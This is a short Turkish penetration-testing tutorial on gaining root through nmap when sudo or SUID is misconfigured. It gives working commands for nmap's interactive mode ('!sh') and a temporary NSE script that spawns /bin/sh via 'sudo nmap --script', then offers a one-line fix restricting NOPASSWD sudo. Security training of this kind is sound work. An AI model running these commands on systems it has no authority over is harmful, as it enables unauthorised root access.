Nmap Privilege Escalation

Sızma testlerinde hedef makinada nmap var ise "Hak Yükseltme (Privilege Escalation)" işlemi için nmap'i kullanabiliriz. Yanlış yapılandırılmış SUID ile nmap sayesinde hak yükseltebiliriz. Root komutlarını yürütmek için nmap ile etkileşimli bir mod kullanılabilir.

İlk adım olarak; “NOPASSWD” ile Mevcut kullanıcının hangi sudo iznine sahip olduğunu kontrol etmeliyiz;

İkinci satırda nmap'in olduğunu görüyoruz. O zaman nmap --interactive diyerek nmap interaktif moda geçelim;

Nmap “sudo” ayrıcalıkları ile çalıştırılmıştır. Şimdi nmap'de shel düşmek için;

!bash veya !sh

komutlarını çalıştırdıktan sonra root yetkileri ile çalışacağız;

Exploit - 2

Eğer --interactive seçeneği aktif değilse farklı olarak şu payload kullanılabilir;

• sudo -l

• sudo -u root nmap –interactive

İstediğimiz sonucu aldıktan sonra çevresel değişkenlerle (environmental variables) ilerlemeye deneyelim;

• TF=$(mktemp)

• echo ‘os.execute(“/bin/sh”)’ > $TF

• sudo nmap –script=$TF

Root olduk...

Bu soruna çözüm olarak; bir kullanıcının sudo (NOPASSWD) kullanarak erişebileceği komutları sınırlayabilirsiniz.

Kaynakça;

https://vk9-sec.com/nmap-privilege-escalation/

https://gtfobins.github.io/gtfobins/nmap/

https://w0lfram1te.com/privilege-escalation-with-nmap